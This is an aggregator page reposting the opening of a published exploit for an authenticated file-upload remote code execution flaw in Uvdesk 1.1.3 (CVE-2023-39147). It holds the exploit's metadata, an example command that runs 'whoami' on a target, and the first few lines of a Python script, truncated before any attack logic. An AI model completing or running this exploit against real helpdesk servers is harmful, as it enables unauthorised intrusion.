vimarsana.com
Home
Live Updates
Uvdesk 1.1.3 Shell Upload - KizzMyAnthia.com : vimarsana.com
Uvdesk 1.1.3 Shell Upload - KizzMyAnthia.com : vimarsana.com
Uvdesk 1.1.3 Shell Upload - KizzMyAnthia.com
# Exploit Title: Uvdesk v1.1.3 - File Upload Remote Code Execution (RCE) (Authenticated)# Date: 28/07/2023# Exploit Author: Daniel Barros (@cupc4k3d) - Hakai Offensive Security # Vendor Homepage: https://www.uvdesk.com# Software Link: https://github.com/uvdesk/community-skeleton# Version: 1.1.3# Example: python3 CVE-2023-39147.py -u "http://$ip:8000/" -c "whoami"# CVE : CVE-2023-39147# Tested on: Ubuntu 20.04.6import requestsimport argparsedef get_args():parser = argparse.ArgumentParser()parser.add_argument('-u', '--url', required=True, action='store',
Related Keywords
Daniel Barros ,
Software Link ,
Exploit Title ,
File Upload Remote Code Execution ,
Exploit Author ,
Hakai Offensive Security ,
Vendor Homepage ,